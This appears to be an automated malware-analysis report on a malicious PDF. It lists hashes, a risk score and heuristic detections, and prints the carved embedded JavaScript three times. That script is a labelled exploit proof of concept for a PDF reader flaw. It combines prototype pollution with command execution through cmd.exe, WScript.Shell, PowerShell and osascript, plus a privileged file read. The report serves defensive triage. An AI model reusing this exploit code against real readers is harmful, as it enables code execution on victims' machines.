PDF malware analysis — malicious · 7a53df6961128d71

MALICIOUS

PDF

4.4 KB

MD5: ff0b2abed6870ac5a73f4b59bffba870 SHA-1: ae1dcb2f92c152d97c3d8b7f1f84e07ff6a6310c SHA-256: 7a53df6961128d7113069238cfb047b9b22972b7e08057c859950a0c7812e64d

258 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9997

Heuristics 8

Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related critical CVE likely CVE_2026_3461_RELATED

PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION

PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD

PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
app.launchURL with file/cmd/UNC target high PDF_FOXIT_LAUNCHURL

PDF JavaScript invokes app.launchURL() with a file://, cmd:, or UNC target — Foxit and Adobe handle these schemes inconsistently and they have been used for code execution and NTLM credential theft. (matched in decompressed stream)
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://www.example.com In document body

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0006_000.js` `3a0e5a60437c4ef48f69f145116164be25107c396cfb1620a870a215cca02d27`	pdf-javascript-stream	PDF /JS object 6 at offset 0x15	3657 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 9 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script (function _lccbbhpxau() { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-15T22:33:54.874778 // === Prototype Pollution (CVE-2026-34621) === try { Object.prototype.__defineGetter__('__trusted', function() { return true; }); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch(e) {} // === OS Detection === var os = 'unknown'; try { if (typeof app !== 'undefined' && app.platform) { var pf = app.platform.toLowerCase(); if (pf.indexOf('win') >= 0) os = 'windows'; else if (pf.indexOf('mac') >= 0) os = 'macos'; } if (os === 'unknown' && typeof navigator !== 'undefined') { var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf('windows') >= 0) os = 'windows'; else if (ua.indexOf('mac') >= 0) os = 'macos'; else if (ua.indexOf('android') >= 0) os = 'android'; else if (ua.indexOf('iphone') >= 0 \|\| ua.indexOf('ipad') >= 0) os = 'ios'; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios } } catch(e) {} // === OS-Specific Execution === try { if (os === 'windows') { // Method 1: app.launchURL with cmd.exe try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("calc.exe"), true); } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("calc.exe", 0, false); } catch(e2) {} // Method 3: PowerShell direct try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("powershell -Command "calc.exe"", 0, false); } catch(e3) {} } else if (os === 'macos') { // Method 1: Terminal via file:// try { app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("open /System/Applications/Calculator.app"), true); } catch(e1) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL('osascript://' + encodeURIComponent(script)); } catch(e2) {} } else { // Mobile platforms: demo fallback (not vulnerable) try { app.launchURL('https://www.example.com', true); app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var path = (os === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; util.readFileIntoStream({cDIPath: path, bEncodeBase64: true}); } } catch(e) {} })();
`javascript_obj0006_001.js` `de0b9eb0537d3dfd7797892a46043e093e29f1c2dcfb3f9105d8c2e07685fa21`	pdf-javascript-stream	PDF /JS object 6 at offset 0x15	3798 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 9 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script << /JS ( \(function _lccbbhpxau\(\) { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-15T22:33:54.874778 // === Prototype Pollution \(CVE-2026-34621\) === try { Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch\(e\) {} // === OS Detection === var os = 'unknown'; try { if \(typeof app !== 'undefined' && app.platform\) { var pf = app.platform.toLowerCase\(\); if \(pf.indexOf\('win'\) >= 0\) os = 'windows'; else if \(pf.indexOf\('mac'\) >= 0\) os = 'macos'; } if \(os === 'unknown' && typeof navigator !== 'undefined'\) { var ua = navigator.userAgent.toLowerCase\(\); if \(ua.indexOf\('windows'\) >= 0\) os = 'windows'; else if \(ua.indexOf\('mac'\) >= 0\) os = 'macos'; else if \(ua.indexOf\('android'\) >= 0\) os = 'android'; else if \(ua.indexOf\('iphone'\) >= 0 \|\| ua.indexOf\('ipad'\) >= 0\) os = 'ios'; } // Adobe-specific mobile detection if \(typeof app !== 'undefined' && app.viewerType\) { if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) os = 'android'; // or ios } } catch\(e\) {} // === OS-Specific Execution === try { if \(os === 'windows'\) { // Method 1: app.launchURL with cmd.exe try { app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\("calc.exe"\), true\); } catch\(e1\) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject\('WScript.Shell'\); shell.Run\("calc.exe", 0, false\); } catch\(e2\) {} // Method 3: PowerShell direct try { var shell = new ActiveXObject\('WScript.Shell'\); shell.Run\("powershell -Command "calc.exe"", 0, false\); } catch\(e3\) {} } else if \(os === 'macos'\) { // Method 1: Terminal via file:// try { app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("open /System/Applications/Calculator.app"\), true\); } catch\(e1\) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL\('osascript://' + encodeURIComponent\(script\)\); } catch\(e2\) {} } else { // Mobile platforms: demo fallback \(not vulnerable\) try { app.launchURL\('https://www.example.com', true\); app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\); } catch\(e\) {} } } catch\(mainErr\) {} // Additional trigger: attempt privileged file read to escalate context try { if \(typeof util !== 'undefined' && util.readFileIntoStream\) { var path = \(os === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts'; util.readFileIntoStream\({cDIPath: path, bEncodeBase64: true}\); } } catch\(e\) {} }\)\(\); ) /S /JavaScript >>
`combined_document_js_000.js` `91e2d06509ba97cec52507204e10a71a7b0c681b6b3e864715c7423a295a0006`	deobfuscated-js	combined document JavaScript streams at offset 0x15	7456 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 18 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script (function _lccbbhpxau() { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-15T22:33:54.874778 // === Prototype Pollution (CVE-2026-34621) === try { Object.prototype.__defineGetter__('__trusted', function() { return true; }); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch(e) {} // === OS Detection === var os = 'unknown'; try { if (typeof app !== 'undefined' && app.platform) { var pf = app.platform.toLowerCase(); if (pf.indexOf('win') >= 0) os = 'windows'; else if (pf.indexOf('mac') >= 0) os = 'macos'; } if (os === 'unknown' && typeof navigator !== 'undefined') { var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf('windows') >= 0) os = 'windows'; else if (ua.indexOf('mac') >= 0) os = 'macos'; else if (ua.indexOf('android') >= 0) os = 'android'; else if (ua.indexOf('iphone') >= 0 \|\| ua.indexOf('ipad') >= 0) os = 'ios'; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios } } catch(e) {} // === OS-Specific Execution === try { if (os === 'windows') { // Method 1: app.launchURL with cmd.exe try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("calc.exe"), true); } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("calc.exe", 0, false); } catch(e2) {} // Method 3: PowerShell direct try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("powershell -Command "calc.exe"", 0, false); } catch(e3) {} } else if (os === 'macos') { // Method 1: Terminal via file:// try { app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("open /System/Applications/Calculator.app"), true); } catch(e1) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL('osascript://' + encodeURIComponent(script)); } catch(e2) {} } else { // Mobile platforms: demo fallback (not vulnerable) try { app.launchURL('https://www.example.com', true); app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var path = (os === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; util.readFileIntoStream({cDIPath: path, bEncodeBase64: true}); } } catch(e) {} })(); << /JS ( \(function _lccbbhpxau\(\) { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-15T22:33:54.874778 // === Prototype Pollution \(CVE-2026-34621\) === try { Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.pr ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.